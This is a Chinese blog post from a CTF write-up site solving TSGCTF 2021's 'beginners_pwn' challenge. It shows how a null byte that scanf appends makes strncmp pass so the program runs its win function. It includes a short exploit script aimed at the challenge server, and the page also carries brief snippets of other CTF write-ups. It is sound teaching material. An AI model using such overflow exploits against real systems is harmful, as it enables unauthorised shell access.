TSGCTF 2021 beginners_pwn wp

最新推荐文章于 2023-07-05 09:26:33 发布
最新推荐文章于 2023-07-05 09:26:33 发布
阅读量269 收藏
点赞数
分类专栏: TSGCTF 2021 WP 文章标签: c语言 python wp unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51724251/article/details/120602325
版权

**
程序逻辑很简单,ptr指针指向读进来的flag,s1是自己输入的字符串,通过strncmp判等,相等就能执行win函数。首先需要知道scanf("%s")在读取字符串的时候会在末尾加上一个’\x00’来截断

在这里插入图片描述
看一下栈里的情况,s1与ptr的偏移是0x40,那么在输入s1时,只要输入长度大于0x40,就会在
0x40+1,也即ptr+1处写上一个’\x00’
再看一下strncmp函数,比较两个字符串的前n位,若str1==str2,返回0,若str1>str2返回正数, 若
str1<str2返回正数。
事实上,strncmp的返回值是str1和str2第一个不相同位的ascii码的差值。
但重点是strncmp也会被‘\x00’截断
因此只要让s1和ptr的第一位都是’\x00‘,strncmp就会返回0,从而执行win函数getshell

from pwn_debug import * 
context.log_level = 'debug' 

pdbg = pwn_debug("./chall") 

pdbg.local("") 
pdbg.remote("34.146.101.4", 30007) 

p = pdbg.run("local") 
p.recv() 
p.sendline("\x00"*(0x40)) 
p.interactive()

tips:最开始以为c语言中非一个负值会得到正值,所以一直想着让strncmp返回一个负值就能执行win。捯饬了半天也打不通,最后发现c语言中非负值得到的也是0。

NNanfeng
关注
专栏目录
[GKCTF 2021]RRRRsa
weixin_51867782的博客
07-08 3256
复现[GKCTF 2021]RRRRsa 拿到题目后,准备操作,额,,, 看了看大佬的wp,恍然大悟,分享一下解题的思路。(部分题目如下) 一般看到这种像hint1的式子,都需要用gcd(,n)去分解出q或p。推导过程如下(官方题解) 推导过程需要用到二项式定理和费马定理。原理如下: 1)二项式定理: 2)费马定理:a^p = a mod p; 了解原理后,在看题解就容易多了。总结了一下: 1)拿到两个式子后,先把括号去掉,然后把常数项去掉; 2)之后得到的式子应该是俩个只含p或q的式子,让两个式子的p(
UNCTF 2021部分wp
m0_46599939的博客
12-10 4288
UNCTF 2021 部分WP 1.WEB (1)fuzz_md5 Get、post传参,preg_replace 的绕过再搞一个md5强碰撞得到开头66666开头的,0e347857 Pyload: 得到flag (2)Can_you_hacked_me 查看源代码 www.zip,数据库 和index.php 这waf绕不过,remote_addr也伪造不了,老实传参了admin 加个空格(约束),密码admin secret (3)Phpmysql 审计后这段考的php原生类,百度了一波可以
TSG CTF 2020:Beginner‘s Crypto 密码学中的数论基础——逆元
个人笔记
07-22 1929
问题描述 Suffix suffices, right? Hint for beginners: Can you see the two assert functions in the attached python script? These are describing the preconditions to be met. These statements read the secret content of the file named flag.txt and check if they ar
UNCTF2021 部分wp.pdf
12-10
unctf2021
TSGCTF 2021 Welcome to TSG CTF! WP
NNanfeng
10-04 280
这道题我们队里讨论了很久,最后也是看了日本师傅的wp才做出来 content-type: application/json content-length:4 null 最后的flag:TSGCTF{M4king_We6_ch4l1en9e_i5_1ik3_playing_Jenga}
TSGCTF 2021 wp
NNanfeng
10-04 267
TSGCTF 2021 wp 记录一位外国友人的wp(需要魔法上网) https://qiita.com/kusano_k/items/1dfc4bca725cead0f182
CTF小题三道
qq_67643013的博客
07-05 365
3、[鹤城杯 2021]Crazy_Rsa_Tech #低指数广播加密。1、[SWPUCTF 2021 新生赛]crypto2 # 共模攻击。2、[羊城杯 2021]Bigrsa #共享素数。
SystemTap_Beginners_Guide.pdf
12-03
SystemTap是一个由Red Hat公司开发的开源工具,主要用于Linux系统。它允许用户通过内核预留的探针位置来跟踪内核事件,对内核系统调用和性能数据进行统计分析。通过SystemTap,开发者和系统管理员能够理解系统内部的...
SIMOTION_EXAMPLE_FOR_BEGINNERS_D435_EN_beginners_simotion_
10-04
SIMOTION_EXAMPLE_FOR_BEGINNERS_D435_EN是一个针对初学者的教程,旨在帮助新手了解和掌握SIMOTION D435的相关知识。SIMOTION是西门子(Siemens)推出的一种高性能运动控制系统,它结合了PLC(可编程逻辑控制器)的...
CCNA_NETWORKING_FOR_BEGINNERS_The_Best_Beginners_Crash_Course
04-07
CCNA_NETWORKING_FOR_BEGINNERS_The_Best_Beginners_Crash_Course.pdf
Delphi Programming 4 Beginners_官方_delphi_入门手册_xe7_beginners_
09-29
《Delphi Programming 4 Beginners》是专为初学者设计的官方入门手册,针对XE7版本,旨在引导读者快速掌握Delphi编程基础。Delphi是一种基于Object Pascal语言的强大集成开发环境(IDE),它以其高效的编译器和直观...
latex_templates.zip_Latex Template_beginners_latex_template
09-23
《LaTeX 模板初学者指南》 LaTeX 是一种基于 TeX 的排版系统,广泛应用于科技论文、书籍、报告等文档的编写,尤其在数学、物理、计算机科学等领域中备受青睐。对于初学者来说,掌握 LaTeX 模板的使用能够快速上手并...
UNCTF 2020 WP
qq_45796470的博客
03-11 2614
UNCTF 2020 WP WEB easy_ssrf 由题ssrf,且代码过滤了很多重要手段。这里可以直接/?url=unctf.com/…/…/…/…/flag。直接…/穿越读flag。 easyunserialize <?php error_reporting(0); highlight_file(__FILE__); class a { public $uname; public $password; public function __construct($un
UNCTF2021 部分WP
weixin_46356548的博客
12-07 2426
Cola UNCTF2021 Writeup Web fuzz_md5 审计源码,需传入user、pass,user需要=“unctf”,pass的md5前5位需要=“66666”。 user使用preg_replace,替换unctf为空,但仅替换一次,可使用ununctfctf双写绕过。 $a=preg_replace("/unctf/i","",$user); md5使用脚本爆破 import hashlib md5 = "66666" for asc1 in range(48,123):
scanf返回值_IO FILE之任意读写和scanf的限制绕过
weixin_39738667的博客
11-30 421
本文将简单介绍一下scanf的长度绕过和由fwrite、fread实现的任意读写,然后用两个ctf例题(2018年的两道国赛题 echo_back 和 magic)来加深理解。本文中write_s,write_e,read_s,read_e分别表示开始写入的开始结束地址、读取的开始结束地址。fread 之 stdin任意写网上介绍fread源码分析的文章很多,所以本文就不着重分析他的...
pwn|软件安全相关问题学习笔记
柷敔的博客
04-16 1533
软件安全相关问题比较琐碎,很多东西一时间记住了但是之后又忘掉了,因此以此文来荟萃各种零零散散的知识点,以备不虞。
栈溢出漏洞的利用和缓解
weixin_34133829的博客
03-24 851
一直有人说这个时代做渗透太难了, 各个平台都开始重视安全性, 不像十几年前, 随便有个栈溢出就能轻松利用. 现在的环境对于新手而言确实不算友好, 上来就需要 面临着各种边界保护, 堆栈保护, 地址布局随机化. 但现实如此, 与其抱怨, 不如直面现实, 拥抱变化, 对吧? 本文所演示的环境为64位Linux+32位ELF程序. 文中所用到的代码和exp皆可在github仓库中找到. 前言 知识...
hello world! computer programming for kids and other beginners_2nd edition.p
最新发布
01-16
《Hello World!计算机编程给儿童和初学者_第二版》是一本适合儿童和初学者学习计算机编程的书籍。编程是现代社会重要的技能之一,它可以帮助我们理解计算机和软件的工作原理,并且培养逻辑思维和解决问题的能力。 这本书的第二版在第一版的基础上进行了更新和改进,以更好地适应现代教学方法和技术。它采用了简单明了的语言和图解,让初学者能够轻松理解编程的基本概念和原理。书中涵盖了多种编程语言和工具,如Python、Scratch等,读者可以选择适合自己的学习方式。此外,书中还包含了一些实例和项目,帮助读者通过动手实践巩固所学知识。 这本书的目标读者是儿童和其他初学者,因此它注重趣味性和互动性。通过编程游戏和挑战,读者可以在实践中学习,培养对编程的兴趣。书中还特别关注学习计划的设计和个性化的学习体验,使每个读者都能找到适合自己的学习路径。 总而言之,《Hello World!计算机编程给儿童和初学者_第二版》是一本适合儿童和初学者学习计算机编程的优秀教材。它综合了理论知识、实践技巧和趣味性,帮助读者建立起坚实的编程基础,并开启一段有趣的编程之旅。对于想要了解和学习计算机编程的人来说,这本书是一个很好的选择。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值